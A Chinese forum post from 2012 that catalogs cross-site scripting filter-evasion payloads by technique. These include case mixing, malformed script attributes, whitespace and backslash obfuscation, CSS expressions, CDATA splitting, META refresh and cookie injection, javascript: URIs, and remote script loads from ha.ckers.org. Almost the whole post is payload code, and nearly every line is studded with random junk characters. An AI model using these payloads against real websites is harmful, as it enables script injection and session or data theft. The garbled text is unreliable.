1. 改变字符大小写* d; e3 r7 H3 }) \
: ~, Q$ C' S9 Y* W8 @) [9 ^! I # [. j' {. D$ ?! o
: U4 F- _. I) } <sCript>alert(‘d’)</scRipT>
+ w- V( l6 a+ m. S, }7 E. w8 g& r% `! i6 z8 n( r' Y& @0 v
2. 利用多加一些其它字符来规避Regular Expression的检查
4 A. h0 x: z, d j
- U% P& }' A! ^5 K& _ <<script>alert(‘c’)//<</script>
* H5 c# Z4 r, V- v# h% t, y% l* s- e1 G( k9 p: i0 X6 d! ~
<SCRIPT a=">" SRC="t.js"></SCRIPT>" i" r) c6 H" ?: H
& L! t6 c; J# W
<SCRIPT =">" SRC="t.js"></SCRIPT>
6 y. l" ^% D1 |# d
2 _$ f1 c: y& X <SCRIPT a=">" ” SRC="t.js"></SCRIPT>7 D- K9 g+ E- X" Q- j0 o
* s& V) Y5 u7 j% _, D- k <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
) v) v2 ?$ F; D2 ^3 X/ d+ ]. G1 ?: _& d# |0 T4 C) X6 Q# q
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
; N' c6 G3 M; V; n1 j8 A! u' z1 L6 j! j9 F$ \
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
( q/ H* W* j" R1 X4 R7 P( q+ m. d; e/ ~ w* N! O) k
3. 以其它扩展名取代.js
& J( P- U5 t* g8 v E7 ?! L+ a4 n5 s+ a/ w# Y/ c2 \
<script src="bad.jpg"></script># |& y3 u; X7 u" q8 Y- \2 w
% Q# _/ |7 L! G4 C7 C8 q5 n% {
4. 将Javascript写在CSS档里
# ~* M/ r* r, |% @1 f# n5 z* t% u" [% b" ?3 a7 ]8 [- l1 \' @
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">" c1 s# b8 D" T0 ]" c+ f. q
0 {( d; E& K6 g* w example:
( v. F" k: R, O) P0 F" O+ S) @" ?) p1 w/ \2 o) R+ {
body {
8 ?% T4 G& l$ |: j& }( f4 w0 C4 S1 }2 D4 H! ]0 }
background-image: url(‘javascript:alert("XSS");’)/ j k" ]& k6 ]( w* C' ]. r' I) b
' r) m3 l& L: |# B) h
}, ~5 T5 Q" h; M' {; Z6 e6 r
5 v1 y% s: S9 ` B$ V7 ] i; q
5. 在script的tag里加入一些其它字符4 F( k/ `3 K- |& l# y- x1 B
Y) B- o' w% V& x" X6 `
<SCRIPT/SRC="t.js"></SCRIPT>
, }/ h4 `3 ~9 |
' Q( T+ {+ B3 R& _7 @' Y <SCRIPT/anyword SRC="t.js"></SCRIPT>
8 I. k& n& `, }+ q1 I( F% e) T$ n* R$ O) ~2 P' f Y
6. 使用tab或是new line来规避
/ D I+ v" C) {6 t0 R- z0 H8 N9 [ p! ^: K6 U" v
<img src="jav ascr ipt:alert(‘XSS3′)">+ x" l8 [ {( ?/ w6 e, ^. q
, i; ]& M3 B. E: N4 t/ P( |
<img src="jav ascr ipt:alert(‘XSS3′)">
+ R1 g4 f( N d+ ^8 a9 g' S: Q' E8 ~
<IMG SRC="jav ascript:alert(‘XSS’);">; Y/ \+ o4 \% u, d3 Z* ^+ \ e) k
& S5 x) S; i8 ` -> tag
/ A) _% I8 h: o5 O9 y5 k, |4 R' i$ _+ A7 u! `7 c ^2 R3 X. @
-> new line: q/ c" m0 d7 s* Q. q' @: V w
. U h7 H) Z8 N I
7. 使用"\"来规避: a- m" v, `2 n5 {
' V9 Y) e) J6 f <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
' g: G6 o) G% R7 a% G; W
9 R& K+ g0 k4 l, g; }- f" Y <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>0 P+ ?# V4 ]9 {* X3 f i
% D+ L( q0 e5 {4 E# \7 `
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">: e8 @" u6 _3 y" X8 D- z
! W, [& N% M* b7 _+ M8 u
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">4 q# o1 T' B- T0 {5 V7 n$ T' S
& f3 C( e: S4 d4 @
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>1 P2 \8 j$ u" r W6 a/ y
$ S: L- N$ D5 I- I) M8. 使用Hex encode来规避(也可能会把";"拿掉)# a2 h9 R0 V+ y4 ~2 t* ^
5 i2 |. e$ B2 L8 f. i <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
& {6 `2 A2 v3 ^- R$ g/ ^' l: V6 b" R$ j. j$ n' g; U$ y( ~+ I. W
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">4 J5 N }& w+ x6 \" {
1 o/ F; c1 z& i! l* e: p6 _/ C$ ^
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">0 C& O8 `3 p1 \; y. g+ {7 k3 L0 I
3 U7 b4 s+ C$ ^
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">* ?, X8 x- {4 v2 Z
( H( e* F8 i: O5 I7 N; v9 D
9. script in HTML tag- a( i3 M% T" t2 \: \' f8 a
" e, W$ f2 g1 D( j <body onload=」alert(‘onload’)」>6 _5 w3 t. I+ R+ J2 g7 [5 e
8 ]( O% I# [) x# d
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload# _; K) L1 l }6 R: {. `1 a
0 J E7 V" ^" r+ `9 z; p! p: S
10. 在swf里含有xss的code
8 ]& A* | F4 O: A
5 f* I9 E0 k/ C <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>$ v1 a3 p+ ?6 z7 j* @
' }5 ^2 p4 h' \/ g$ b( C# i11. 利用CDATA将xss的code拆开,再组合起来。
; V8 ~( G2 n0 N. r% D3 D! O3 w+ t+ y. Y8 w& @9 r( o
<XML ID=I><X><C>& z+ H& F- T9 d9 B4 p5 p
6 z# w6 g! |1 l0 Y# @/ F3 y, F6 w% _ <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>3 j( R, `/ P8 }- z
Q' r: d( t1 F; U b1 V$ h </C></X>
; v$ @* i6 _7 J7 t2 z3 o/ X; R- u' J0 a5 Q! z% ?" x, {
</xml>
4 L* k/ E2 K; M0 }. ^! |% r# p
( f3 l* E, w; V+ G0 J <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- z$ l, ]( m6 Z! ~# \* G! R0 w5 B, S5 _: m
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
! P$ y; ?0 {8 r$ P
! W2 x; Z* H+ b <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
+ g( P( w& ^ ?; [
3 U" o4 \5 G' K3 } x0 P0 o4 x; T( ?12. 利用HTML+TIME。
- I5 p0 m$ v9 e9 B f0 Z2 K
; [4 o) h5 \6 O4 D; |9 h5 P0 ^ <HTML><BODY>
$ {# @* @0 n( Y4 X& \5 b5 A4 b$ a' {4 M1 I5 e$ k# P
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
& V3 |; Q, @2 S3 _3 a6 `0 Z8 J* s) M. j% T" L' n
<?import namespace="t" implementation="#default#time2">
: j# l# Q. U; r! V8 ]# M1 g* g, F. F: n# X
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">7 u$ W/ `! o" O8 H6 K
# N! F( T8 u! ? g
</BODY></HTML>9 e( S! [& x; N* }! E* A
( t3 j6 B9 b ~& W% i5 t13. 透过META写入Cookie。
3 w" s5 Z" S0 _ P' z6 u6 [5 S
$ J8 B$ d5 k0 W( r2 S7 W. n <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
; B8 X7 u4 F7 z4 \+ B
, X% C V- Z1 n6 s& Y' S5 U14. javascript in src , href , url
5 L/ _4 W0 A b4 C0 j4 F
; H; G6 t& ~8 t$ k* C& q+ A <IFRAME SRC=javascript:alert(’13′)></IFRAME># x# y% y% o$ J5 g+ I7 ~8 X" ?
4 b' c+ k2 E' Z5 j- P <img src="javascript:alert(‘XSS3′)">( _# n0 [4 J' v
. Y$ N I" C; \
<IMG DYNSRC="javascript:alert(‘XSS20′)">" ]6 R2 }. H1 Q/ g" M; M
8 @$ R: C' g/ {: z9 I' F, z <IMG LOWSRC="javascript:alert(‘XSS21′)">( o" E' n* d4 I
$ [+ D. H3 D& z0 T( b5 t <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">; l" b; _! j/ @% U/ J
( A8 S" p- v W( e& H <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>7 b4 s1 D* N7 }! r0 N+ C4 h
5 O: n5 F2 ]2 N- k' o+ @
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
: O1 m4 `' c# o {4 @# O% _5 g2 H: p( c, J; j/ X
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
, ^+ F* k2 {7 w9 X+ \4 g2 t( ]7 M+ u2 d0 {7 d+ O
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
# |' O9 M( | Q9 J4 C/ M' V& k6 [, I, }* Y
</STYLE><A CLASS=XSS></A>! T* g: J$ b: i- |/ E
8 \9 C2 o9 I: P% b <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
" C9 }' K/ l& [
/ f* h; k @* Y |
发表于 2012-12-31 09:59:28
收藏
支持
反对